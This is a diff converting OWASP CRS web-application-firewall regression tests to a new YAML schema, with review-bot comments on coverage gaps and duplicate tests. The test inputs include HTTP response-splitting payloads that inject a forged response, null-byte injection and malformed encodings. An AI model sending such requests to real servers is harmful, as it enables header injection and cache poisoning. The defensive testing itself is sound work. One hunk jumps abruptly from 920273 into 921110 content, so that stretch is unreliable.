agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=%E2%A3" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log: + expect_ids: [920250] 
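Review bot: There is no negative test in this file: all four cases expect 920250 to fire, and the only statement that valid UTF-8 must pass is buried in test 4's `desc` (`%C2%A3 is a valid Pound sign`), which no test actually sends. A change that makes 920250 over-match on well-formed multi-byte sequences would therefore go unnoticed; a `no_expect_ids` case with `%C2%A3` closes that gap. The comment `# crs-setup.conf needs to have CRS_VALIDATE_UTF8_ENCODING set` still hangs off test 1's sequence dash as a YAML comment; with the new schema it belongs in `meta.description` so the prerequisite shows up in ftw output instead of only to someone reading the file.
```yaml
# … unchanged: tests 1-4 …
  - test_id: 5
    desc: "Valid UTF-8 (%C2%A3, Pound sign) must not trigger 920250"
    stages:
      - input:
          dest_addr: "127.0.0.1"
          port: 80
          uri: "/?param=%C2%A3"
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: "localhost"
            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
          version: "HTTP/1.1"
        output:
          log:
            no_expect_ids: [920250]
```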
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml index dc65d1722..074276e9f 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml 
@@ -1,53 +1,51 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920260.yaml" - description: "Description" +rule_id: 920260 tests: - - test_title: 920260-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=%uff0F" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920260\"" - - test_title: 920260-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?test=%uff0F" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920260] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=%u0F" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920260\"" - - # Test taken from existing modsec regression - test_title: 920260-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?test=%u0F" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920260] + - test_id: 3 + desc: Test taken from existing modsec regression stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=foo%uFF01" - version: "HTTP/1.0" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: 
"300" - Proxy-Connection: "keep-alive" - output: - log_contains: "id \"920260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?param=foo%uFF01" + version: "HTTP/1.0" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + output: + log: + expect_ids: [920260] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml index 5df5cf568..5ddeb17d6 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml 
@@ -1,141 +1,135 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920270.yaml" - description: "Description" +rule_id: 920270 tests: - - test_title: 920270-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%00=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" - - test_title: 920270-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%00=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920270] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%00" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" - - test_title: 920270-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%00" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920270] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%00=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" - - # This causes apache to error before it gets to CRS. 
Therefore - # we'll mark this as a status 400 now until the FTW OR output is added - test_title: 920270-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%00=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920270] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost%00" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - status: [403, 400] - # log_contains: "id \"920270\"" - - test_title: 920270-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost%00" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + status: 400 + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Referer: "anything%00" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" - - test_title: 920270-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Referer: "anything%00" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920270] + - test_id: 6 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%40=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: 
"localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920270\"" - - test_title: 920270-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%40=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920270] + - test_id: 7 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%FD=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920270\"" - - test_title: 920270-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%FD=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920270] + - test_id: 8 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%FD=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920270\"" - - # Test converted from old tests - test_title: 920270-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%FD=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920270] + - test_id: 9 + desc: Test converted from old tests 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=foo%00" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=foo%00" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log: + expect_ids: [920270] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml index bb265a1fe..da227ce23 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml 
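Review bot: Test 4 narrows its expectation from `status: [403, 400]` to `status: 400` and drops the two-line comment that explained it (`This causes apache to error before it gets to CRS …`), so the test now depends on the web server rejecting `Host: localhost%00` itself rather than on CRS; on a server that accepts that header, CRS would answer 403 and the test fails unless an override file covers it — worth confirming before the wider expectation is gone. Whatever the answer, keep the rationale in the file: `desc: "The server rejects the malformed Host header with 400 before CRS runs, so 920270 is not reached"`. Tests 1 and 3 are byte-identical (`/?test%00=test1`), as are tests 7 and 8 (`/?test%FD=test1`); the migration is the moment to either delete the duplicates or give them distinct payloads (a null byte in a different argument position, say) so the test count does not overstate coverage.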
@@ -1,92 +1,90 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920271.yaml" - description: "Description" +rule_id: 920271 tests: - - test_title: 920271-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%127" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920271\"" - - test_title: 920271-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%127" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920271] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%03" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920271\"" - - test_title: 920271-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%03" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920271] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%00=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920271\"" - - test_title: 920271-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%00=test1" + headers: + 
User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920271] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Cookie: hi%13=bye - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920271\"" - - test_title: 920271-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: hi%13=bye + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920271] + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/%20index.html?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920271\"" - - test_title: 920271-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/%20index.html?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920271] + - test_id: 6 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/%FFindex.html?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id 
\"920271\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/%FFindex.html?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920271] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml index 899899fee..96783d5c0 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml 
@@ -1,78 +1,76 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920272.yaml" - description: "Description" +rule_id: 920272 tests: - - test_title: 920272-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%25" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920272\"" - - test_title: 920272-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%25" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920272] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%80" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920272\"" - - test_title: 920272-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%80" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920272] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/index.html?test=t%FFest1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920272\"" - - test_title: 920272-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: 
"/index.html?test=t%FFest1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920272] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%35" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920272\"" - - test_title: 920272-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%35" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920272] + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/i%FFndex.html?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - status: [200] - log_contains: "id \"920272\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/i%FFndex.html?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + status: 200 + log: + expect_ids: [920272] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml index 0589dacc7..981cc1c8a 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml 
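Review bot: None of the five 920272 tests carries a `desc:`, and only test 5 pins `status: 200` next to its `expect_ids`, so a reader cannot tell why a detected request is asserted to complete normally there but not in tests 1–3 (the `%25`, `%80` and argument-vs-path `%FF` cases). A one-line `desc:` per test would record the intent, e.g. `desc: "Invalid percent-encoding in argument value (%25)"` for test 1 and `desc: "Invalid %FF in request path; detected, response still served"` for test 5; the reason for the 200 (anomaly scoring not reaching the blocking threshold) is an inference and should be confirmed before it is written down. Dropping the placeholder `description: "Description"` is right, but since `meta.description` is still used in the 921140 file on this page, a real one-sentence description could take its place.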
@@ -1,79 +1,77 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920273.yaml" - description: "Description" +rule_id: 920273 tests: - - test_title: 920273-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%20" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920273\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%20" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920273] - # the '&' is one of the only symbol allowed - test_title: 920273-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1&test=t" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920273\"" - - test_title: 920273-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1&test=t" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920273] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/index.html?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "\n" - version: "HTTP/1.1" - output: - no_log_contains: id "921110" - - test_title: 921110-11 + - input: 
+ dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/" + data: "var=budget foo)\n" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921110] + - test_id: 11 desc: "HTTP Response Splitting false positive test issue 2054" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/" - data: "var=get it\n" - version: "HTTP/1.1" - output: - no_log_contains: id "921110" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/" + data: "var=get it\n" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921110] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml index cc64c38aa..c7cf96622 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml 
@@ -1,83 +1,81 @@ --- meta: author: csanders-git, Franziska Bühler - description: None - enabled: true - name: 921120.yaml +rule_id: 921120 tests: - - test_title: 921120-1 + - test_id: 1 desc: HTTP response splitting (921120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: /?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0aShazam - version: HTTP/1.1 - output: - log_contains: id "921120" - - test_title: 921120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0aShazam + version: HTTP/1.1 + output: + log: + expect_ids: [921120] + - test_id: 2 desc: "HTTP Response splitting attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/file.jsp?somevar=foobar%0d%0aContent-Length:%2002343432423ftw" - version: HTTP/1.1 - output: - log_contains: id "921120" - - test_title: 921120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: 
localhost + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/file.jsp?somevar=foobar%0d%0aContent-Length:%2002343432423ftw" + version: HTTP/1.1 + output: + log: + expect_ids: [921120] + - test_id: 3 desc: "Fix FP issue 1615. Header followed by word chars." stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/file.jsp?somevar=%0A%0Dlocation:%0A%0D" - version: HTTP/1.1 - output: - no_log_contains: id "921120" - - test_title: 921120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/file.jsp?somevar=%0A%0Dlocation:%0A%0D" + version: HTTP/1.1 + output: + log: + no_expect_ids: [921120] + - test_id: 4 desc: "Status Page Test - Parameter with value 'CR.LF.Content-Length: 0' to match the rule's regular expression" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - 